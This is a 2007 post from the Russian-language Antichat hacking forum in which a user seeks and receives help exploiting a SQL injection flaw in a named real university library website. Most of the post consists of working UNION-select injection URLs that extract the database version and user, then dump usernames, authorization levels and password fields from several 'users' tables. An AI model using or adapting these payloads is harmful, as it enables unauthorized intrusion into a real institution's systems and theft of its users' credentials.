|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от 5taY3r
Что-то я не до конца догоняю,нужен хэлп...)
Есть уязвимость, дб 5 версии
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
Есть таблица 'users'(в других пусто), в ней колонки 'id,username,passwd,name,uwoemail,auth_type,auth_l evel,auth_status', но выводит только 'username,auth_type,auth_level,auth_status'(в остальных пишет ошибку)
rgraves2:script:su:enabled
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+users+limit+0,1/*
Что за херь?! Хэлп! в других БД значит вот например здесь есть:
Код:
http://www.lib.uwo.ca/news/view.php?id=-664'+union+select+1,concat_ws(0x3a,passwd,username,auth_type,auth_level,auth_status),3,4,5,6,7,8,9+from+calculator.users+limit+0,1/*
еще в dissertations.users есть
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 12.12.2007 в 01:17..
|